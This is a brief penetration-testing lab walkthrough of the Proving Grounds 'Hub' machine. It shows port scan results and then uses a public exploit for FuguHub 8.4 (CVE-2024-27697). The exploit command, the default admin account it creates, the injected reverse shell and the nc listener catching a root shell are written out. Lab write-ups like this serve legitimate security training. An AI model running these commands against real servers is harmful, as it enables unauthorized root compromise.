Proving Grounds Practice - Hub

Difficulty: Easy

Scan

autorecon

[*] ssh found on tcp/22.
OpenSSH 8.4p1


[*] http found on tcp/80.
nginx/1.18.0

http://192.168.212.25/readme.txt

FuguHub BarracudaDrive




[*] http found on tcp/8082.
barracudadrive.com
FuguHub 8.4

WebDAV enable



[*] http found on tcp/9999.
https

80 nginx

The port scan found readme.txt; the server-side CMS is FuguHub 8.0.

8082 FuguHub

The site can be accessed directly, with no username/password authentication. The About page shows the Fugu version number: 8.4.

9999

Same as 8082; the only difference is that 9999 is HTTPS.

Foothold

searchsploit fuguhub: an RCE for version 8.1.

Google search: fuguhub 8.4 exploit

https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697

After cloning the code, I ran it directly and successfully obtained a shell; the user is root.

$ python exploit.py -r 192.168.212.25 -rp 8082 -l 192.168.45.234 -p 80
[*] Checking for admin user...
[+] No admin user exists yet, creating account with admin:admin123
[+] User created!
[+] Logging in...
[+] Success! Injecting the reverse shell...
[+] Successfully injected the reverse shell into the About page.
[+] Triggering the reverse shell, check your listener...

rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.25] 59038
id
uid=0(root) gid=0(root) groups=0(root)